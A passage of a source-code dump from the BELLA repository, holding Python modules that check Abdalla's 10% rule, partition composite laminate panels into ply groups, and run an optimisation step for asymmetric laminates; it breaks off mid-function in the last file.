"length_bytes": 3601,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 107,
"path": "/src/guidelines/ten_percent_rule_Abdalla.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nApplication of the 10% rule for the design of a laminate\r\n\r\n- display_ply_counts\r\n displays the ply counts in each fibre direction for a laminate lay-up\r\n\r\n- is_ten_percent_rule\r\n returns True for a panel stacking sequence satisfying the 10% rule,\r\n False otherwise\r\n\r\n- calc_penalty_10_ss and calc_penalty_10_pc\r\n returns the stacking sequence penalty for 10% rule\r\n\r\n- ten_percent_rule\r\n returns only the stacking sequences that satisfy the 10% rule when added to\r\n plies for which the ply orientations have been previously determined\r\n\r\n- calc_n_plies_per_angle\r\n returns the ply counts in each fibre direction\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\nimport math\r\n\r\ndef calc_distance_2_points(point1, point2):\r\n \"\"\"\r\n calculates the distance between two points in 2D\r\n\r\n Args:\r\n point1: coordinates of point 1\r\n point2: coordinates of point 2\r\n\r\n Returns:\r\n float: distance between point 1 and point 2\r\n\r\n Examples:\r\n >>> calc_distance_2_points([0, 0], [0, 2])\r\n 2\r\n \"\"\"\r\n return np.linalg.norm(point1 - point2, 2)\r\n\r\n\r\ndef calc_distance_Abdalla(LPs, constraints, num=10000):\r\n \"\"\"\r\n calculates the distance between a lamination arameter point and the\r\n feasible lamination-parameter region for the 10% rule of Abdalla\r\n\r\n Args:\r\n LPs: lamination parameters of a laminate\r\n constraints (instance of the class Constraints): set of design\r\n guidelines\r\n num: number of points taken for respresenting the boundaries of the\r\n lamination-parameter feasible region\r\n\r\n Returns:\r\n float: distance between point (LP1, LP2) and the feasible\r\n lamination-parameter region for the 10% rule of Abdalla\r\n\r\n Examples:\r\n >>> constraints=Constraints(rule_10_percent=True, rule_10_Abdalla=True,\r\n percent_Abdalla=10)\r\n >>> calc_distance_Abdalla(LPs=np.array([0, 0]), constraints)\r\n 0\r\n \"\"\"\r\n\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n if math.pow((1 - 4 * constraints.percent_Abdalla), 2) \\\r\n + (1 - 4 * constraints.percent_Abdalla) * LPs[1] \\\r\n - 2 * math.pow(LPs[0], 2) + 1e-15 > 0 \\\r\n and 1 - 4 * constraints.percent_Abdalla - LPs[1] + 1e-15 > 0:\r\n return 0\r\n\r\n LP1_max = math.sqrt(1 - 4 * constraints.percent_Abdalla)\r\n LP1_min = - LP1_max\r\n\r\n def point_parabola_Abdalla(LP1, constraints):\r\n LP2 = 2 * (LP1 / (1 - 4 * constraints.percent_Abdalla)) **2 \\\r\n - (1 - 4 * constraints.percent_Abdalla)\r\n return np.array([LP1, LP2])\r\n\r\n def point_straight_curve_Abdalla(LP1, constraints):\r\n LP2 = 1 - 4 * constraints.percent_Abdalla\r\n return np.array([LP1, LP2])\r\n\r\n\r\n min1 = min((calc_distance_2_points(\r\n LPs[0:2], point_parabola_Abdalla(LP1, constraints)) \\\r\n for LP1 in np.linspace(LP1_min, LP1_max, num)))\r\n\r\n min2 = min((calc_distance_2_points(\r\n LPs[0:2], point_straight_curve_Abdalla(LP1, constraints)) \\\r\n for LP1 in np.linspace(LP1_min, LP1_max, num)))\r\n\r\n return min(min1, min2)\r\n\r\n#import sys\r\n#sys.path.append(r'C:\\BELLA')\r\n#from src.BELLA.constraints import Constraints\r\n#constraints =Constraints(rule_10_percent=True,\r\n# rule_10_Abdalla=True,\r\n# percent_Abdalla=10)\r\n#print(calc_distance_Abdalla(\r\n# np.array([(1 - 4 * constraints.percent_Abdalla)/math.sqrt(2), 0]),\r\n# constraints))\r\n"
},
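The early-exit test in `calc_distance_Abdalla` can be read as two closed-form inequalities on the first two lamination parameters: with c = 1 - 4 * percent_Abdalla, the point (LP1, LP2) lies in the feasible region when c² + c·LP2 - 2·LP1² ≥ 0 and LP2 ≤ c. A small numeric check of that reading (assuming the percentage is stored as a fraction; the `Constraints` object is replaced by a plain number here):

```python
def inside_abdalla_region(lp1, lp2, percent):
    """Feasibility test for Abdalla's 10% rule on (LP1, LP2)."""
    c = 1 - 4 * percent
    return c ** 2 + c * lp2 - 2 * lp1 ** 2 >= 0 and lp2 <= c

# percent = 0.10 -> c = 0.6
print(inside_abdalla_region(0.0, 0.0, 0.10))  # True: the origin is feasible
print(inside_abdalla_region(0.9, 0.0, 0.10))  # False: 0.36 - 1.62 < 0
```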
{
"alpha_fraction": 0.5474771857261658,
"alphanum_fraction": 0.5558555126190186,
"avg_line_length": 42.94560623168945,
"blob_id": "8a798f30c6892b0d076a37dd388a34fe1f2abdcb",
"content_id": "38a48073f1940e93bd8a0da2b0e933c1e630d048",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21484,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 478,
"path": "/src/BELLA/divide_panels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to divide the panels into groups of plies\r\n\r\n- divide_panels\r\n divides the plies of each panel into groups of plies and calculates the\r\n lamination parameter coefficients for the objective functions that accounts\r\n for the normalised positive areas and first and second moments of areas\r\n\r\n- forbidden_ply_counts\r\n determines the ply counts that lead to an impossible partitioning of the\r\n plies into groups of allowed number of plies\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\n\r\nclass PartitioningError(Exception):\r\n \" Errors occuring during the partition of the panels into groups of plies\"\r\n\r\ndef divide_panels(multipanel, parameters, constraints):\r\n \"\"\"\r\n divides the plies of each panel into groups of plies and calculates the\r\n lamination parameter coefficients for the objective functions that accounts\r\n for the normalised positive areas and first and second moments of areas\r\n\r\n Guidelines:\r\n 1: The first two outer plies should not be stopped\r\n 2: The number of ply drops should be minimal (not butt joints)\r\n 3: The ply drops should be distributed as evenly as possible along the\r\n thickness of the laminates\r\n 4: If this is not exactly possible the ply drops should rather be\r\n concentrated in the larger groups (because smaller groups have a\r\n smaller design space)\r\n 5: Then ply drops away from the middle plane are prefered to limit fibre\r\n waviness\r\n\r\n INPUTS\r\n\r\n - multipanel: multipanel structure\r\n - parameters: optimiser parameters\r\n - constraints: set of design and manufacturing constraints\r\n \"\"\"\r\n #===================\r\n # Division of the thickest panel into groups of plies\r\n #===================\r\n if constraints.sym:\r\n\r\n # evaluate the number of ply orientations for covering plies\r\n n_lam = multipanel.n_plies_max - 2*constraints.n_covering\r\n\r\n mini = ma.ceil(ma.floor(n_lam/2)/parameters.group_size_max)\r\n maxi = ma.floor(ma.floor(n_lam/2)/parameters.group_size_min)\r\n if mini > maxi:\r\n raise PartitioningError(\"\"\"\r\nPartitioning of the laminate not possible with the current group size\r\nlimitations !\r\n Try increasing the maximum number of plies per group or reducing the\r\n minimum number of plies per group.\"\"\")\r\n\r\n # The loop ensures that the division into groups is conformed to the\r\n # constraints on the group sizes, and groups of maximum size are\r\n # prefered\r\n for n_groups in np.arange(mini, maxi + 1):\r\n\r\n # ?\r\n missing = n_groups*parameters.group_size_max - ma.floor(n_lam/2)\r\n if missing > (parameters.group_size_max \\\r\n - parameters.group_size_min)*n_groups:\r\n continue\r\n\r\n #\r\n if n_groups == 0:\r\n continue\r\n\r\n # distribution of parameters.group_size_min plies in each group\r\n n_plies_in_groups = parameters.group_size_min * \\\r\n np.ones((n_groups,), int)\r\n\r\n # n_extra: number of remaining plies to be distributed in the groups\r\n n_extra = ma.floor(n_lam/2) \\\r\n - n_groups*parameters.group_size_min\r\n\r\n # n_full_groups: number of groups that can be totally filled by the\r\n # distribution of the remianing plies\r\n if n_extra >= parameters.group_size_max \\\r\n - 
parameters.group_size_min and n_extra != 0:\r\n n_full_groups = n_extra \\\r\n // (parameters.group_size_max-parameters.group_size_min)\r\n n_extra = n_extra \\\r\n % (parameters.group_size_max-parameters.group_size_min)\r\n else:\r\n n_full_groups = 0\r\n\r\n # filling of the n_full_groups\r\n n_plies_in_groups[n_groups - n_full_groups:] \\\r\n = parameters.group_size_max\r\n\r\n # distribution of the last remaining plies\r\n if n_extra != 0:\r\n n_plies_in_groups[n_groups - n_full_groups - 1] += n_extra\r\n\r\n # pos_first_ply_groups: position of the first ply of each group in\r\n # the order in which they appear in the stacking sequence\r\n pos_first_ply_groups = np.zeros((n_groups,), int)\r\n # pos_first_ply_groups[0] = 1\r\n for ind in np.arange(1, n_groups):\r\n pos_first_ply_groups[ind] \\\r\n = pos_first_ply_groups[ind - 1] + n_plies_in_groups[ind - 1]\r\n break\r\n\r\n # checking group sizes are correct (should not return an error!!!)\r\n if multipanel.thick_panel_has_middle_ply:\r\n if sum(n_plies_in_groups)*2 + 1 != n_lam:\r\n raise PartitioningError('Wrong partitioning!')\r\n elif sum(n_plies_in_groups)*2 != n_lam:\r\n raise PartitioningError('Wrong partitioning!')\r\n\r\n# if middle_ply != 0:\r\n# n_plies_in_groups[-1] += 1\r\n\r\n if n_groups > maxi:\r\n raise PartitioningError('''\r\nNo partition possible of the plies into groups of smaller size\r\nparameters.group_size_min and bigger size parameters.group_size_max.\r\nIncrease parameters.group_size_max or decrease parameters.group_size_min.\r\n''')\r\n\r\n else: # for non symmetric laminates\r\n\r\n # Evaluate the number of ply orientations for covering plies\r\n n_lam = multipanel.n_plies_max - 2*constraints.n_covering\r\n\r\n mini = ma.ceil(n_lam/parameters.group_size_max)\r\n maxi = ma.floor(n_lam/parameters.group_size_min)\r\n\r\n if mini > maxi:\r\n raise PartitioningError(\"\"\"\r\nPartitioning of the laminate not possible with the current group size\r\nlimitations !\r\n Try increasing the maximum number of plies per group or reducing the\r\n minimum number of plies per group.\"\"\")\r\n\r\n # iteration with increasing number of groups\r\n for n_groups in np.arange(mini, maxi + 1):\r\n # ?\r\n missing = n_groups * parameters.group_size_max \\\r\n - n_lam\r\n if missing > (parameters.group_size_max \\\r\n - parameters.group_size_min)*n_groups:\r\n continue\r\n\r\n #\r\n if n_groups == 0:\r\n continue\r\n\r\n # distribution of parameters.group_size_min plies in each group\r\n n_plies_in_groups = parameters.group_size_min \\\r\n * np.ones((n_groups,), int)\r\n\r\n # n_extra: number of remaining plies to be distributed in groups\r\n n_extra = n_lam - n_groups*parameters.group_size_min\r\n\r\n # n_full_groups: number of groups that can be totally filled by the\r\n # distribution of the remaining plies\r\n if n_extra >= parameters.group_size_max \\\r\n - parameters.group_size_min and n_extra != 0:\r\n n_full_groups = n_extra // (\r\n parameters.group_size_max - parameters.group_size_min)\r\n n_extra %= (\r\n parameters.group_size_max - parameters.group_size_min)\r\n else:\r\n n_full_groups = 0\r\n\r\n if n_full_groups > 0:\r\n n_plies_in_groups[-n_full_groups:] \\\r\n = parameters.group_size_max\r\n # Addition of the last other plies\r\n if n_extra != 0:\r\n n_plies_in_groups[-(n_full_groups + 1)] += n_extra\r\n\r\n # order_of_groups: group sizes in the order in which they\r\n # appear in the stacking sequence\r\n middle_point = ma.ceil(n_groups/2)\r\n order_of_groups = np.zeros((n_groups,), int)\r\n 
order_of_groups[:middle_point] \\\r\n                = n_plies_in_groups[0:2*middle_point:2]\r\n            order_of_groups[middle_point:] = np.flip(\r\n                n_plies_in_groups[1:n_groups:2], axis=0)\r\n\r\n            # pos_of_groups: position of the first ply of each\r\n            # group in the order they appear in the final stacking sequence\r\n            pos_of_groups = np.zeros((n_groups,), int)\r\n            # pos_of_groups[0] = 1\r\n            for ind in np.arange(1, n_groups):\r\n                pos_of_groups[ind] = pos_of_groups[ind - 1] \\\r\n                    + order_of_groups[ind - 1]\r\n\r\n            pos_first_ply_groups = np.ones((n_groups,), int)\r\n            pos_first_ply_groups[0:2*middle_point:2] \\\r\n                = pos_of_groups[:middle_point]\r\n            pos_first_ply_groups[1:n_groups:2] = np.flip(\r\n                pos_of_groups[middle_point:], axis=0)\r\n            break\r\n\r\n        # checking group sizes are correct (should not return an error!!!)\r\n        if sum(n_plies_in_groups) != n_lam:\r\n            raise PartitioningError('Wrong partitioning!')\r\n\r\n        if n_groups > maxi:\r\n            raise PartitioningError('''\r\nNo partition possible of the plies into groups of smaller size\r\nparameters.group_size_min and bigger size parameters.group_size_max.\r\nIncrease parameters.group_size_max or decrease parameters.group_size_min.\r\n''')\r\n\r\n#    # correction for when middle ply not in largest laminate\r\n#    if multipanel.has_middle_ply \\\r\n#    and multipanel.reduced.panels[-1].middle_ply == 0:\r\n#        n_plies_in_groups += 1\r\n\r\n    # number of plies per group for thickest laminates\r\n    multipanel.reduced.n_plies_per_group = n_plies_in_groups\r\n    # position of the group first plies for thickest laminates\r\n    multipanel.reduced.n_first_plies = pos_first_ply_groups\r\n    # number of groups\r\n    multipanel.reduced.n_groups = n_groups\r\n    # percentage of the laminate thickness associated with each group\r\n    # for thickest laminates\r\n    percent_thickness = multipanel.reduced.n_plies_per_group \\\r\n    / sum(multipanel.reduced.n_plies_per_group)\r\n#    print('percent_thickness\\n', percent_thickness, '\\n')\r\n\r\n#    print('multipanel.reduced.n_plies_per_group',\r\n#          multipanel.reduced.n_plies_per_group)\r\n#    print('multipanel.reduced.n_first_plies',\r\n#          multipanel.reduced.n_first_plies)\r\n#    print('multipanel.n_plies_max', multipanel.n_plies_max)\r\n\r\n    #===================\r\n    # Division of other panels into groups of plies\r\n    #===================\r\n    for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n        # ----- if panel is one of the thickest panels ----- #\r\n        if panel.n_plies == multipanel.n_plies_max:\r\n            #--------------------------\r\n            # number of plies per group\r\n            #--------------------------\r\n            panel.n_plies_per_group \\\r\n                = multipanel.reduced.n_plies_per_group.astype(int)\r\n            #--------------------------\r\n            # position of the group first plies\r\n            #--------------------------\r\n            panel.n_first_plies = multipanel.reduced.n_first_plies\r\n            #--------------------------\r\n            # Number of ply drops for each group compared\r\n            # to the groups of the thickest laminate\r\n            #--------------------------\r\n            panel.n_ply_drops = np.zeros((multipanel.reduced.n_groups,))\r\n        else: # ----- if panel is not one of the thickest panels ----- #\r\n            #--------------------------\r\n            # Distribution of the ply drops in the groups of the panel\r\n            # from comparison with the thickest panel\r\n            #--------------------------\r\n            n_plies_panel = panel.n_plies\r\n            if constraints.sym: # middle plies not included!\r\n                if n_plies_panel % 2:\r\n                    n_plies_panel -= 1\r\n                n_drops = (multipanel.n_plies_max - n_plies_panel)/2\r\n            else:\r\n                n_drops = multipanel.n_plies_max - 
n_plies_panel\r\n\r\n #print('n_plies', n_plies_panel, '\\n')\r\n\r\n #print('n_drops', n_drops, '\\n')\r\n #print('percent_thickness', percent_thickness)\r\n\r\n # attempt of a uniform distribution of ply drops\r\n n_ply_drops = np.floor(n_drops*percent_thickness).astype(float)\r\n\r\n# # correction for potential middle ply\r\n# if panel.middle_ply != 0:\r\n# if n_ply_drops[-1] > 0:\r\n# n_ply_drops[-1] -= 0.5\r\n# elif np.allclose(np.zeros((multipanel.reduced.n_groups,)),\r\n# n_ply_drops):\r\n# n_ply_drops[-1] = 0.5\r\n# else:\r\n# for index_group in range(\r\n# multipanel.reduced.n_groups -1)[::-1]:\r\n# if n_ply_drops[index_group] != 0:\r\n# n_ply_drops[index_group] -= 1\r\n# n_ply_drops[-1] = 0.5\r\n# break\r\n\r\n missing = int(n_drops - np.sum(n_ply_drops))\r\n #print('Ply drops per group:', n_ply_drops, '\\n')\r\n #print('missing ply drops:', missing, '\\n')\r\n # Addition of the missing ply drops\r\n iteration = 0\r\n while missing > 0:\r\n for index_group in range(multipanel.reduced.n_groups):\r\n if multipanel.reduced.n_plies_per_group[index_group] == \\\r\n parameters.group_size_max - iteration:\r\n n_ply_drops[index_group] += 1\r\n missing -= 1\r\n if missing == 0:\r\n break\r\n iteration += 1\r\n # Here, panel.n_ply_drops = chosen combination of ply drops\r\n panel.n_ply_drops = n_ply_drops\r\n #--------------------------\r\n # number of plies per group\r\n #--------------------------\r\n panel.n_plies_per_group = (multipanel.reduced.n_plies_per_group \\\r\n - panel.n_ply_drops).astype(int)\r\n #--------------------------\r\n # position of each group first ply\r\n #--------------------------\r\n if constraints.sym:\r\n n_first_plies = np.zeros(\r\n (multipanel.reduced.n_groups,), dtype=int)\r\n n_first_plies[0] = constraints.n_covering\r\n\r\n for jjj in range(1, multipanel.reduced.n_groups):\r\n n_first_plies[jjj] = n_first_plies[jjj - 1] \\\r\n + panel.n_plies_per_group[jjj - 1]\r\n panel.n_first_plies = n_first_plies\r\n #print(panel.n_plies_per_group)\r\n #print(n_first_plies)\r\n else:\r\n n_first_plies_b = np.zeros(\r\n (multipanel.reduced.n_groups,), dtype=int)\r\n n_first_plies = np.zeros(\r\n (multipanel.reduced.n_groups,), dtype=int)\r\n n_first_plies[0] = constraints.n_covering\r\n n_first_plies_b[0] = constraints.n_covering\r\n # order_of_groups: group sizes in the order\r\n # they appear in the final stacking sequence - in a column\r\n middle_point = ma.ceil(multipanel.reduced.n_groups/2)\r\n order_of_groups = np.zeros((multipanel.reduced.n_groups,), int)\r\n order_of_groups[:middle_point] = \\\r\n panel.n_plies_per_group[0:2*middle_point:2]\r\n order_of_groups[middle_point: ] = np.flip(\r\n panel.n_plies_per_group[1:multipanel.reduced.n_groups:2],\r\n axis=0)\r\n for index_group in np.arange(1, multipanel.reduced.n_groups):\r\n n_first_plies_b[index_group] \\\r\n = n_first_plies_b[index_group - 1] \\\r\n + order_of_groups[index_group-1]\r\n # Filling the start positions for each group in the table\r\n n_first_plies[0:2*middle_point:2] = \\\r\n n_first_plies_b[:middle_point]\r\n n_first_plies[1:multipanel.reduced.n_groups:2] \\\r\n = np.flip(n_first_plies_b[middle_point: ], axis=0)\r\n panel.n_first_plies = n_first_plies\r\n #print(panel.n_first_plies)\r\n\r\n\r\ndef forbidden_ply_counts(constraints, parameters):\r\n \"\"\"\r\n determines the ply counts that lead to an impossible partitioning of the\r\n plies into groups of allowed number of plies\r\n\r\n INPUTS\r\n\r\n - constraints.n_plies_min: minimum number of plies for a laminate\r\n - 
constraints.n_plies_max: maximum number of plies for a laminate\r\n - group_size_min: minimum number of plies for a group\r\n - group_size_max: maximum number of plies for a group\r\n - constraints.sym = True for symmetric laminates\r\n \"\"\"\r\n result = []\r\n for n_plies_test in range(constraints.n_plies_min,\r\n constraints.n_plies_max + 1):\r\n try:\r\n #===================\r\n # Division of the thickest panel into groups of plies\r\n #===================\r\n if constraints.sym:\r\n n_lam = n_plies_test - 2*constraints.n_covering\r\n mini = ma.ceil(ma.floor(n_lam/2)/parameters.group_size_max)\r\n maxi = ma.floor(ma.floor(n_lam/2)/parameters.group_size_min)\r\n if mini > maxi:\r\n raise PartitioningError(\"\"\"\r\nPartitioning of the laminate not possible with the current group size\r\nlimitations !\r\n Try increasing the maximum number of plies per group or reducing the\r\n minimum number of plies per group.\"\"\")\r\n else: # for non symmetric laminates\r\n n_lam = n_plies_test - 2*constraints.n_covering\r\n mini = ma.ceil(n_lam/parameters.group_size_max)\r\n maxi = ma.floor(n_lam/parameters.group_size_min)\r\n if mini > maxi:\r\n raise PartitioningError(\"\"\"\r\nPartitioning of the laminate not possible with the current group size\r\nlimitations !\r\n Try increasing the maximum number of plies per group or reducing the\r\n minimum number of plies per group.\"\"\")\r\n except PartitioningError:\r\n result.append(n_plies_test)\r\n else:\r\n pass\r\n return np.array(result)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the function divide_panels ***\\n')\r\n constraints = Constraints(n_covering=0, \r\n covering=False, \r\n sym=True)\r\n parameters = Parameters(constraints=constraints,\r\n group_size_max=10, \r\n group_size_min=6)\r\n n_plies_target1 = 81\r\n n_plies_target2 = 70\r\n n_plies_target3 = n_plies_target2\r\n n_plies_target4 = n_plies_target2\r\n panel_1 = Panel(ID=1,\r\n n_plies=n_plies_target1,\r\n constraints=constraints,\r\n neighbour_panels=[2])\r\n panel_2 = Panel(ID=2,\r\n n_plies=n_plies_target2,\r\n constraints=constraints,\r\n neighbour_panels=[1])\r\n panel_3 = Panel(ID=3,\r\n n_plies=n_plies_target3,\r\n constraints=constraints,\r\n neighbour_panels=[2])\r\n panel_4 = Panel(ID=4,\r\n n_plies=n_plies_target4,\r\n constraints=constraints,\r\n neighbour_panels=[2])\r\n multipanel = MultiPanel(panels=[panel_1, panel_2, panel_3, panel_4])\r\n multipanel.from_mp_to_blending_strip(constraints)\r\n \r\n print(f'Panel 1: {multipanel.reduced.panels[0].n_plies} plies')\r\n print(f'Panel 2: {multipanel.reduced.panels[1].n_plies} plies')\r\n# print(f'Panel 3: {multipanel.reduced.panels[2].n_plies} plies')\r\n divide_panels(multipanel, parameters, constraints)\r\n print('\\n')\r\n print(f'Panel 1: number of plies per groups = {multipanel.reduced.panels[0].n_plies_per_group}',\r\n sum(multipanel.reduced.panels[0].n_plies_per_group))\r\n print(f'Panel 2: number of plies per groups = {multipanel.reduced.panels[1].n_plies_per_group}',\r\n sum(multipanel.reduced.panels[1].n_plies_per_group))\r\n# print(f'Panel 3: number of plies per groups = {multipanel.reduced.panels[2].n_plies_per_group}',\r\n# sum(multipanel.reduced.panels[2].n_plies_per_group))\r\n print('\\n')\r\n print(f'Panel 1: number of ply drops per group = {multipanel.reduced.panels[0].n_ply_drops}')\r\n print(f'Panel 2: number of ply drops per group = {multipanel.reduced.panels[1].n_ply_drops}')\r\n# print(f'Panel 3: number of ply drops per group = {multipanel.reduced.panels[2].n_ply_drops}')\r\n 
print('\\n')\r\n print(f'Panel 1: position group first plies = {multipanel.reduced.panels[0].n_first_plies}')\r\n print(f'Panel 2: position group first plies = {multipanel.reduced.panels[1].n_first_plies}')\r\n# print(f'Panel 3: position group first plies = {multipanel.reduced.panels[2].n_first_plies}')\r\n\r\n print('\\n*** Test for the function forbidden_ply_counts ***\\n')\r\n constraints = Constraints(\r\n n_covering=1, \r\n covering=True, \r\n sym=True, \r\n n_plies_min=10, \r\n n_plies_max=100)\r\n parameters = Parameters(constraints, \r\n group_size_min=5, \r\n group_size_max=7)\r\n result = forbidden_ply_counts(constraints, parameters)\r\n print(f'Forbidden ply counts: {result}\\n')\r\n"
},
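Stripped of the symmetry and covering-ply handling, the partitioning arithmetic in `divide_panels` is: the admissible group counts run from ceil(n/group_size_max) up to floor(n/group_size_min); every group starts at the minimum size and the leftover plies are poured into the trailing (larger) groups until none remain. A compact stand-alone sketch of that distribution (a simplified model, not the full `divide_panels`, which also computes ply positions and ply-drop counts):

```python
import math
import numpy as np

def partition_sketch(n_plies, size_min, size_max):
    """Split n_plies into groups whose sizes lie in [size_min, size_max]."""
    n_groups = math.ceil(n_plies / size_max)  # fewest groups possible
    if n_groups > math.floor(n_plies / size_min):
        raise ValueError("no partition possible with these group sizes")
    groups = size_min * np.ones((n_groups,), dtype=int)
    extra = n_plies - groups.sum()
    ind = n_groups - 1
    while extra > 0:  # fill the later groups first, as divide_panels does
        room = min(extra, size_max - groups[ind])
        groups[ind] += room
        extra -= room
        ind -= 1
    return groups

print(partition_sketch(43, 6, 10))  # [ 6  7 10 10 10] -> sums to 43
```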
{
"alpha_fraction": 0.6078500151634216,
"alphanum_fraction": 0.6158172488212585,
"avg_line_length": 36.445945739746094,
"blob_id": "57f0ee0bdf678a8d46b0925cc9efcbe0875add9c",
"content_id": "324958358c1ab5b64f7818ecf0f715850000a002",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8535,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 222,
"path": "/src/LAYLA_V02/outer_step_asym.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\ninner loop optimiser for asymmetric laminates\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport random\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.balance import calc_penalty_bal\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_oopo_ss\r\nfrom src.LAYLA_V02.objectives import calc_obj_multi_ss\r\nfrom src.LAYLA_V02.objectives import objectives\r\nfrom src.LAYLA_V02.beam_search import beam_search\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\ndef outer_step_asym(\r\n parameters,\r\n constraints,\r\n targets,\r\n lampam_assumed,\r\n lampam_weightings,\r\n n_plies_in_groups,\r\n levels_in_groups,\r\n n_groups,\r\n cummul_mom_areas,\r\n delta_lampams,\r\n mat_prop=None,\r\n not_constraints=None):\r\n '''\r\n performs an inner loop for asymmetric and unbalanced laminates\r\n\r\n OUTPUTS\r\n\r\n - outer_step_result: instance of the class OuterStepResults\r\n\r\n INPUTS\r\n\r\n - parameters: input parameters for the tuning of the algorithm\r\n - constraints: set of constraints\r\n - targets: target lamination parameters and ply counts\r\n - n_plies: total number of plies\r\n - cummul_mom_areas: cummulated ply moments of areas\r\n - delta_lampams: ply partial lamination parameters\r\n - lampam_assumed: the assumption of the remaining partial\r\n lamination parameters\r\n - lampam_weightings: lamination parameter weightings at each search level\r\n - levels_in_groups: indices of the plies for each ply group optimisation\r\n - n_groups: number of groups\r\n - mat_prop: material properties of the laminae\r\n - not_constraints: design guidelines that should not be satisfied\r\n '''\r\n outer_step_result = OuterStepResults()\r\n\r\n lampam_current = sum(lampam_assumed) # initial lamination parameters\r\n n_plies_per_angle = np.zeros(constraints.n_set_of_angles, float)\r\n ss_top = np.array([], dtype='int16')\r\n ss_bot = np.array([], dtype='int16')\r\n\r\n # details # do not consider\r\n if not_constraints is not None and not_constraints.rule_10_percent:\r\n random_for_10 = random.randint(0, 4)\r\n else:\r\n random_for_10 = None\r\n\r\n for inner_step in range(n_groups):\r\n\r\n# print('inner_step', inner_step)\r\n\r\n if inner_step < n_groups - 1: # not last ply group\r\n lampam_current -= lampam_assumed[inner_step]\r\n\r\n result = beam_search(\r\n levels=levels_in_groups[inner_step],\r\n lampam_current=lampam_current,\r\n lampam_weightings=lampam_weightings,\r\n group_size=n_plies_in_groups[inner_step],\r\n targets=targets,\r\n parameters=parameters,\r\n constraints=constraints,\r\n n_plies_per_angle=n_plies_per_angle,\r\n cummul_mom_areas=cummul_mom_areas,\r\n delta_lampams=delta_lampams,\r\n last_group=False,\r\n mat_prop=mat_prop,\r\n not_constraints=not_constraints,\r\n random_for_10=random_for_10,\r\n ss_top=ss_top,\r\n ss_bot=ss_bot)\r\n\r\n lampam_current = result.lampam_best\r\n n_plies_per_angle = result.ply_counts\r\n# outer_step_result.n_obj_func_calls += result.n_obj_func_calls\r\n\r\n ss_bot = np.hstack((ss_bot, result.ss_bot_best))\r\n ss_top = np.hstack((result.ss_top_best, ss_top))\r\n# print('result.ss_top_best', result.ss_top_best)\r\n# print('result.ss_bot_best', result.ss_bot_best)\r\n# print('ss_top', ss_top)\r\n# print('ss_bot', ss_bot)\r\n\r\n elif inner_step == n_groups - 1: # last ply group\r\n\r\n lampam_current -= 
lampam_assumed[inner_step]\r\n\r\n            result = beam_search(\r\n                levels=levels_in_groups[inner_step],\r\n                lampam_current=lampam_current,\r\n                lampam_weightings=lampam_weightings,\r\n                group_size=n_plies_in_groups[inner_step],\r\n                targets=targets,\r\n                parameters=parameters,\r\n                constraints=constraints,\r\n                n_plies_per_angle=n_plies_per_angle,\r\n                cummul_mom_areas=cummul_mom_areas,\r\n                delta_lampams=delta_lampams,\r\n                last_group=True,\r\n                mat_prop=mat_prop,\r\n                not_constraints=not_constraints,\r\n                random_for_10=random_for_10,\r\n                ss_top=ss_top,\r\n                ss_bot=ss_bot)\r\n\r\n            outer_step_result.lampam_best = result.lampam_best\r\n#            outer_step_result.n_obj_func_calls += result.n_obj_func_calls\r\n            outer_step_result.n_designs_last_level = result.n_designs_last_level\r\n            outer_step_result.n_designs_repaired = result.n_designs_repaired\r\n            outer_step_result.n_designs_repaired_unique \\\r\n                = result.n_designs_repaired_unique\r\n            outer_step_result.ss_best = result.ss_best\r\n\r\n    obj_no_const = objectives(\r\n        outer_step_result.lampam_best,\r\n        targets=targets,\r\n        lampam_weightings=lampam_weightings[-1],\r\n        constraints=constraints,\r\n        parameters=parameters,\r\n        mat_prop=mat_prop)\r\n\r\n    n_plies_per_angle = np.zeros((constraints.n_set_of_angles,), float)\r\n    for ind in range(outer_step_result.ss_best.size):\r\n        index = constraints.ind_angles_dict[outer_step_result.ss_best[ind]]\r\n        n_plies_per_angle[index] += 1\r\n\r\n    # calculation of the penalties for the in-plane and out-of-plane\r\n    # orthotropy requirements based on lamination parameters\r\n    penalty_ipo_lampam, penalty_oopo = calc_penalty_ipo_oopo_ss(\r\n        outer_step_result.lampam_best,\r\n        constraints=constraints,\r\n        parameters=parameters)\r\n#    print('penalty_ipo_lampam', penalty_ipo_lampam)\r\n#    print('penalty_oopo', penalty_oopo)\r\n\r\n    # calculation of the penalties for the in-plane orthotropy\r\n    # requirements based on ply counts\r\n    penalty_ipo_pc = 0\r\n    if constraints.ipo and parameters.penalty_bal_switch:\r\n        penalty_ipo_pc = calc_penalty_bal(\r\n            n_plies_per_angle,\r\n            constraints)\r\n#    print('penalty_ipo_pc', penalty_ipo_pc)\r\n\r\n    penalty_10 = 0\r\n    if constraints.rule_10_percent:\r\n        penalty_10 = calc_penalty_10_pc(n_plies_per_angle, 